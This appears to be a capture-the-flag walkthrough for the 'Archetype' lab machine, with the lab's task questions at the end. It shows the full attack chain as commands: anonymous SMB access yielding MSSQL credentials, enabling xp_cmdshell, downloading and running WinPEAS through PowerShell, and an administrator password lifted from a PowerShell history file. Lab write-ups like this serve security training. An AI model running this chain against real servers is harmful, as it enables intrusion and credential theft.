$ archetype.pwn()
An SMB share named 'backups' is accessible without credentials, containing a configuration file with MSSQL credentials. We connect to the SQL server and enable xp_cmdshell for command execution. WinPEAS reveals ConsoleHost_history.txt with the administrator password.
Techniques
Open Ports
Terminal Session
# Port scanning
nmap -sV -p- 10.129.195.70
# PORT STATE SERVICE VERSION
# 445/tcp open smb Microsoft Windows
# 1433/tcp open mssql Microsoft SQL Server
# Enumerate SMB shares
smbclient -L \\10.129.195.70\
# Share: backups (non-admin)
# Connect to backups share
smbclient \\10.129.195.70\backups
# get prod.dtsConfig → contains MSSQL credentials
# Connect to SQL Server
impacket-mssqlclient ARCHETYPE/sql_svc@10.129.195.70 -windows-auth
# Enable command execution
SELECT IS_SRVROLEMEMBER('sysadmin');
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
# nt service\mssqlsvc
# Download WinPEAS for privilege escalation
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest winpeas.exe -OutFile C:\winpeas.exe"';
EXEC xp_cmdshell 'C:\winpeas.exe';
# WinPEAS reveals: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# Contents: net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
[✓] Administrator password found → flags captured!Tasks (7)
Which TCP port is hosting a database server?
What is the name of the non-Administrative share available over SMB?
What is the password identified in the file on the SMB share?
What script from the Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
What extended stored procedure of Microsoft SQL Server can be used to spawn a Windows command shell and pass in a string for execution?
What script can be used in order to search possible paths to escalate privileges on Windows hosts?
What file contains the administrator's password?